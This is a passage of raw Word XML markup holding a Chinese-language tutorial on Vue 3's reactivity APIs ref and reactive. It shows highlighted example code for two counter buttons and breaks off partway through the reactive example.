        <w:t>响应式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AP</w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00B13BBD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  ref</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79292C8C" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B9EEFB8" w14:textId="0B343341" w:rsidR="003D73B1" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中显示了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> count</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这么一个变量，那么我们每次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> count</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">++ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能不能让按钮回显每次加数后的值呢？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAEC802" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3471E638" w14:textId="61A5E5FB" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先需要引入</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B55">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { ref } from 'vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE48DBE" w14:textId="5C9E10BD" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后在声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B55">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ref(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这样</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>就会成为一个对象（非整形），操作值需要操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B55">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ount.value</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，然后操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B55">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ount.value++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6CC82E" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62EA2DC3" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEA8754" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C567429" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首页，欢迎！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB33024" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;el-button @click="addCount"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244AE0D2" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B55">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>{{  count }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679FA8FC" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7322BD6F" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16CA4F20" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;HelloWorld/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4A4594" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5C3F7E" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FCA0DC" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB3FAD4" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAA67DD" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B55">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { ref } from 'vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705F62BF" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    import HelloWorld from '../components/HelloWorld.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165C34F2" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A67EF9E" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B55">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">let count =  </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B55">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ref(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30607A15" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="003850DF" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    function addCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B833B4E" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B55">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>count.value++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4486CCF8" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        console.log(count)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02721FB4" w14:textId="77777777" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD9826C" w14:textId="6F36E9DF" w:rsidR="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3448267D" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E9609B4" w14:textId="04C9B320" w:rsidR="00B13BBD" w:rsidRPr="00433B55" w:rsidRDefault="00B13BBD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AP</w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reactive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF95397" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7785013A" w14:textId="619F9501" w:rsidR="0045675A" w:rsidRDefault="0045675A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下代码示例两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分别计数自</w:t>
      </w:r>
      <w:r>
        <w:t>+1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E67336B" w14:textId="77777777" w:rsidR="0045675A" w:rsidRDefault="0045675A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E089AF3" w14:textId="7FBCE44E" w:rsidR="003D73B1" w:rsidRPr="00B13BBD" w:rsidRDefault="00B13BBD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13BBD">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { ref, reactive } from 'vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2D46FA" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5308B179" w14:textId="2CC9E05D" w:rsidR="003D73B1" w:rsidRDefault="00B13BBD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，所有普通类型（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> bool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）都得使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>声明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40382C16" w14:textId="13293E3D" w:rsidR="00B13BBD" w:rsidRDefault="00B13BBD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义对象再用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reactive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>声明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F908E9C" w14:textId="77777777" w:rsidR="00B13BBD" w:rsidRDefault="00B13BBD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4553DA20" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE3E793" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E37C61A" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首页，欢迎！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB782CE" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;el-button @click="addCount"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7721C484" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            {{  count }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657CF82F" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064A0336" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRPr="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="007D6AA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;el-button type="primary" @click="addCount2"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6069E3D1" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRPr="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6AA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            {{  form.count }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5955A16A" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007D6AA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451E4D34" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36849ABC" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;HelloWorld/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1830E5C8" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EBE813" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4332E024" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11CDAA9C" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A16DADF" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007D6AA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { ref, reactive } from 'vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D75953" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    import HelloWorld from '../components/HelloWorld.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558ACDD2" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4906D71E" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    let count =  ref(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26776DF8" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EC2954A" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    function addCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E61BB1" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        count.value++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC106AE" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272A0F96" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A4C72F" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRPr="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007D6AA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>function addCount2() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337A19CF" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRPr="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6AA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        form.count++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3CFBD4" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRPr="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6AA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3495E7DB" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRPr="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75EC8F80" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRPr="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6AA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    const form = reactive({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4A24A1" w14:textId="77777777" w:rsidR="007D6AA2" w:rsidRPr="007D6AA2" w:rsidRDefault="007D6AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6AA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        count: 2</w:t>
      </w:r>
    </w:p>
